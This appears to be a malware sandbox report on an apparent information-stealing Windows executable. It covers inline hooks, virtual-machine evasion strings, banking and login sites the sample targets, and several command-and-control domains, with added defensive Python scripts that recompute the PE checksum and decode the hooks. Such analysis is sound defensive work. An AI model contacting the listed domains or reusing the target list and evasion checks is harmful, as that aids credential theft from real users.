Source: Lisect_AVT_24003_G1B_131.exe | String found in binary or memory: Obsolete - Use Cancel (On!)WWW&Return the METAPHONE code for a string!Return a random number in a rangeW8Return index of first matching or non-matching characterWW$Add a GroupBox control to the dialogWW-Return the mean deviation of a list of valuesW(Delete a value from the Windows RegistryWWHStarts a general browsing dialog box for connecting to network resourcesWW-Add a Frame (rectangle) control to the dialogW@Information about time the current time zone and time changeoverWW_Return the angle in radians for a specified hyperbolic cosine (inverse (arc) hyperbolic cosine)WWW*Return a string converted to a units value;Create a new instance of the specifed OLE Automation objectWWW2Get a list of detectable or convertible file types-Resume macro execution from a pause conditionW%Get enabled state of the named regionW
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File read: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Section loaded: ondemandconnroutehelper.dll
Source: Lisect_AVT_24003_G1B_131.exe | Static file information: File size 6602847 > 1048576
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: Raw size of .&u&u is bigger than: 0x100000 < 0x561c00
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: initial sample | Static PE information: section where entry point is pointing to: .&u&u
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: real checksum: 0x64f92b should be: 0x64f932
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: section name: .&u&u
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: section name: .&u&u
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: section name: .&u&u
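The "real checksum ... should be" finding above means the value stored in IMAGE_OPTIONAL_HEADER.CheckSum (0x64f92b) no longer matches what the file's bytes sum to (0x64f932). The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it recomputes an image checksum with the same algorithm the linker and Windows' CheckSumMappedFile use (end-around-carry dword sum, field skipped, folded to 16 bits, plus file length), so the report's expected value can be reproduced offline. The 160-byte image it runs on is a constructed header skeleton for demonstration, not the analysed binary.

```python
import struct


def checksum_field_offset(image):
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum.

    e_lfanew + 4 ("PE\\0\\0") + 20 (IMAGE_FILE_HEADER) + 64: CheckSum sits at
    offset 64 in both the PE32 and the PE32+ optional header.
    """
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    offset = e_lfanew + 4 + 20 + 64
    if offset % 4:
        raise ValueError("optional header is not dword aligned")
    return offset


def pe_checksum(image):
    """Recompute the image checksum the way CheckSumMappedFile does.

    Sum the file as little-endian dwords with end-around carry, skipping the
    CheckSum field itself, fold the result to 16 bits, then add the length.
    """
    skip = checksum_field_offset(image) // 4
    padded = bytes(image) + b"\0" * (-len(image) % 4)   # dword-align the tail
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:                             # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(image)                            # unpadded length


def stored_checksum(image):
    return struct.unpack_from("<I", image, checksum_field_offset(image))[0]


def checksum_status(image):
    """('unset' | 'valid' | 'mismatch', stored value, recomputed value)."""
    stored, computed = stored_checksum(image), pe_checksum(image)
    if stored == 0:
        return "unset", stored, computed
    return ("valid" if stored == computed else "mismatch"), stored, computed


def build_minimal_image(checksum=0):
    """Constructed 160-byte MZ/PE header skeleton (not the analysed sample):
    just enough structure for the functions above to find the CheckSum field."""
    image = bytearray(0xA0)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x40)          # e_lfanew
    image[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", image, 0x44, 0x14C)         # Machine: IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", image, 0x58, 0x10B)         # Magic: PE32
    struct.pack_into("<I", image, 0x98, checksum)      # OptionalHeader.CheckSum
    return bytes(image)


if __name__ == "__main__":
    good = build_minimal_image(pe_checksum(build_minimal_image()))
    print(checksum_status(good))                        # ('valid', 0xA2D4, 0xA2D4)
    tampered = bytearray(good)
    tampered[0x60] ^= 0x01                              # one flipped bit past the headers
    print(checksum_status(bytes(tampered)))             # ('mismatch', 0xA2D4, 0xA2D5)
```

A CheckSum of zero only means the linker never filled the field in, which is normal for user-mode executables (the loader validates it for drivers and certain boot-time system images, not for ordinary programs), so "unset" is not an indicator by itself. A non-zero value that disagrees with the recomputation, as in this report, means the bytes changed after the field was written, which is typical of a packer or a post-build patch and is why the sandbox scores it. `pe_checksum(open(path, "rb").read())` on the real file should reproduce the report's expected value.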

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: A30005 value: E9 8B 2F 4C 76
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2F90 value: E9 7A D0 B3 89
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: A40005 value: E9 2B BA 47 76
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EBBA30 value: E9 DA 45 B8 89
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: A50008 value: E9 8B 8E 4B 76
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76F08E90 value: E9 80 71 B4 89
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: A60005 value: E9 8B 4D 01 75
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 75A74D90 value: E9 7A B2 FE 8A
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: A70005 value: E9 EB EB 01 75
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 75A8EBF0 value: E9 1A 14 FE 8A
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: A80005 value: E9 8B 8A 3D 75
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 75E58A90 value: E9 7A 75 C2 8A
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: A90005 value: E9 2B 02 3F 75
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 75E80230 value: E9 DA FD C0 8A
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2D40005 value: E9 5B 2E 1B 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2E60 value: E9 AA D1 E4 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2D50005 value: E9 EB 3E 1A 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF3EF0 value: E9 1A C1 E5 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2D60005 value: E9 DB 2F 19 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2FE0 value: E9 2A D0 E6 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2D80005 value: E9 BB 2D 17 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2DC0 value: E9 4A D2 E8 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2D90005 value: E9 CB 2A 16 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2AD0 value: E9 3A D5 E9 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2DA0005 value: E9 7B 2B 15 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2B80 value: E9 8A D4 EA 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2DB0005 value: E9 1B 2F 14 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2F20 value: E9 EA D0 EB 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2DC0005 value: E9 FB 2C 13 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2D00 value: E9 0A D3 EC 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2DD0005 value: E9 DB 2D 12 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2DE0 value: E9 2A D2 ED 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2DE0005 value: E9 AB 3E 11 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF3EB0 value: E9 5A C1 EE 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2DF0005 value: E9 2B 2F 10 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2F30 value: E9 DA D0 EF 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2E00005 value: E9 9B 2F 0F 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2FA0 value: E9 6A D0 F0 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2E10005 value: E9 0B 2D 0E 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2D10 value: E9 FA D2 F1 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2E20005 value: E9 CB 3B 0D 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF3BD0 value: E9 3A C4 F2 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2E30005 value: E9 2B 2D 0C 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2D30 value: E9 DA D2 F3 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2E40005 value: E9 4B 47 0B 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF4750 value: E9 BA B8 F4 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2E50005 value: E9 BB 2C 0A 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2CC0 value: E9 4A D3 F5 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2E60005 value: E9 5B 2B 09 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2B60 value: E9 AA D4 F6 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 2E70005 value: E9 6B 2B 08 74
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Memory written: PID: 4424 base: 76EF2B70 value: E9 9A D4 F7 8B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Process information set: NOOPENFILEERRORBOX
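The "Memory written" entries above come in pairs, and every value starts with E9, the x86 near JMP with a 32-bit relative displacement. One write lands at the entry of a library function (the 0x75xxxxxx / 0x76xxxxxx addresses); the other lands a few bytes into a small stub page (0xA30000, 0xA40000, 0x2D40000, ...) and jumps back into that function just past the bytes the first JMP overwrote, which is the classic detour-and-trampoline layout. The script below is an added example, not code from the sample or from Joe Sandbox: it decodes the displacements from a few of those lines (the input is copied from the report, not constructed) and pairs them back into hooks. It assumes, as the report's addresses show, that each stub is a separate page-aligned allocation whose first bytes are the displaced prologue, so the stub's JMP sits at stub_base + displaced and returns to function + displaced.

```python
import re
import struct

# "Memory written" entries copied from the report lines above (PID 4424).
# Each pair describes one inline hook: the first write is the stub's JMP back
# into the hooked function, the second is the patch at the function's entry.
REPORT_LINES = """\
Memory written: PID: 4424 base: A30005 value: E9 8B 2F 4C 76
Memory written: PID: 4424 base: 76EF2F90 value: E9 7A D0 B3 89
Memory written: PID: 4424 base: A50008 value: E9 8B 8E 4B 76
Memory written: PID: 4424 base: 76F08E90 value: E9 80 71 B4 89
Memory written: PID: 4424 base: 2D40005 value: E9 5B 2E 1B 74
Memory written: PID: 4424 base: 76EF2E60 value: E9 AA D1 E4 8B
"""

WRITE_RE = re.compile(r"base:\s*([0-9A-Fa-f]+)\s+value:\s*((?:[0-9A-Fa-f]{2}\s*)+)")


def parse_writes(text):
    """Return [(address, bytes_written), ...] for every 'Memory written' line."""
    writes = []
    for m in WRITE_RE.finditer(text):
        addr = int(m.group(1), 16)
        data = bytes.fromhex("".join(m.group(2).split()))
        writes.append((addr, data))
    return writes


def jmp_target(addr, data):
    """Decode a 5-byte x86 near JMP (E9 rel32) written at addr.

    Returns the absolute destination, or None if the bytes are not a JMP.
    The displacement is relative to the end of the instruction (addr + 5)
    and the result wraps at 32 bits because this is a 32-bit process.
    """
    if len(data) != 5 or data[0] != 0xE9:
        return None
    rel32 = struct.unpack("<i", data[1:5])[0]
    return (addr + 5 + rel32) & 0xFFFFFFFF


def reconstruct_hooks(writes):
    """Pair the JMP writes into function -> handler hooks.

    Assumption (consistent with every address in this report): each stub is a
    page-aligned allocation that begins with the displaced prologue bytes, so
    the stub's JMP is at stub_base + displaced and returns to function + displaced.
    """
    targets = {addr: jmp_target(addr, data) for addr, data in writes}
    hooks = []
    for stub_jmp, back in targets.items():
        displaced = stub_jmp & 0xFFF            # offset of this JMP inside its page
        if back is None or not 1 <= displaced <= 16:
            continue                            # not a JMP, or not a stub's JMP-back
        function = back - displaced             # entry of the hooked function
        handler = targets.get(function)         # where the patched entry now jumps
        stub_base = stub_jmp - displaced
        if handler is None or not stub_base <= handler < stub_base + 0x1000:
            continue                            # the entry patch must land in this stub
        hooks.append({
            "function": function,
            "displaced_bytes": displaced,
            "stub_base": stub_base,
            "handler": handler,
        })
    return sorted(hooks, key=lambda h: h["function"])


def describe(hooks):
    """One human-readable line per reconstructed hook."""
    return [
        f"{h['function']:08X}: entry patched to JMP {h['handler']:08X} "
        f"(stub {h['stub_base']:08X}, {h['displaced_bytes']} prologue bytes displaced)"
        for h in hooks
    ]


if __name__ == "__main__":
    for line in describe(reconstruct_hooks(parse_writes(REPORT_LINES))):
        print(line)
```

On this input the script recovers three hooks: 0x76EF2F90 and 0x76EF2E60 each had 5 prologue bytes moved into a stub, while 0x76F08E90 had 8 (the hook engine copies whole instructions, so the displaced length depends on the function's first instructions). Mapping those addresses to exported function names needs the loaded-module list, which this excerpt does not include, so no names are claimed here.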

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 1295EC7
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 11CBAFB
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 1296DBD
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 123CB96
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 12AB0D3
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 1210F89
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 11C72F8
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 11DAFF0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 135B37A
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 11DA135
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 1381BA2
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 1307EFD
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | API/Special instruction interceptor: Address: 12DEC54
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe TID: 380 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe TID: 380 | Thread sleep time: -30000s >= -30000s
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108948527.0000000003788000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Lisect_AVT_24003_G1B_131.exe, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000707000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108948527.0000000003788000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: associationokeo.shop
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: turkeyunlikelyofw.shop
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: pooreveningfuseor.pw
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: edurestunningcrackyow.fun
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: detectordiscusser.shop
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: problemregardybuiwo.fun
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: lighterepisodeheighte.fun
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: technologyenterdo.shop
